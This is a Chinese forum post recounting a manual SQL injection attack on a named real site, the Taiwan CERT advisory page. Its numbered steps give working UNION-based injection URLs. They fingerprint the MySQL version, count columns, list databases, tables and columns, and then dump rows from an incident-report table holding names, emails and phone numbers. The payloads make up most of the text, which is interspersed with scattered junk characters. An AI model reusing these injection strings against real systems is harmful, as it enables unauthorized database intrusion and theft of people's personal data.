1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询, [: m5 O$ e8 `& K. x% Z+ W4 s* Y
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解. x% r8 U" s6 ~8 e
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
% E# o) H# P! q3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
. {6 v1 w1 g+ M) t; R: @. n0 j数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。; [1 [% [5 j7 I& J3 D& q( g. O
4.判断有没有写权限- H" l. [( T. _$ _3 ~) A
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
! H; b ~. P0 J4 }没办法,手动猜表啦
! H! u# M6 A1 S8 M" C: r2 t5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. x8 n; v6 T7 z% {; q: t( C' r* O; W- [但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
! ] ?' P9 i7 b4 zhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
+ d5 S/ i9 h0 n: Q成功查出所有数据库,国外的黑客就是不一般。数据库如下:; o! t+ T( l% R6 |6 t
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
0 L6 v6 C5 l, W% V' y0 Q6.爆表,爆的是twcert库
- m9 P4 C* _6 O# v, Ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
- r4 h4 ]" e5 q爆出如下表
( @! R' v) w; ~. Zdownloadfile,irsys,newsdata,secrpt,secrpt_big5
3 v0 {% ^2 s2 @" g4 r/ B7.爆列名,这次爆的是irsys表* h& I: Z: h# z
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--" H H& j+ Y$ b. S2 N
爆出如下列
7 p8 X2 M) c; C" O$ V+ g4 e* W) eir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status& t3 F/ v/ ]3 a) [- z! A
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。% m+ i1 z1 \0 o
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
! x& k: W/ B/ L2 ]; o; o, @返回是3,说明每个列里有3个地段# o9 {! R9 I2 w. L
9.爆字段内容, u8 [# _* L6 l3 Q' C6 c6 e1 y( M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
4 I) ?1 r d4 U8 h, b爆出name列的第一个字段的内容3 \3 H) l2 g- f2 j% N
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
! E* n8 M+ S- L( n" g爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对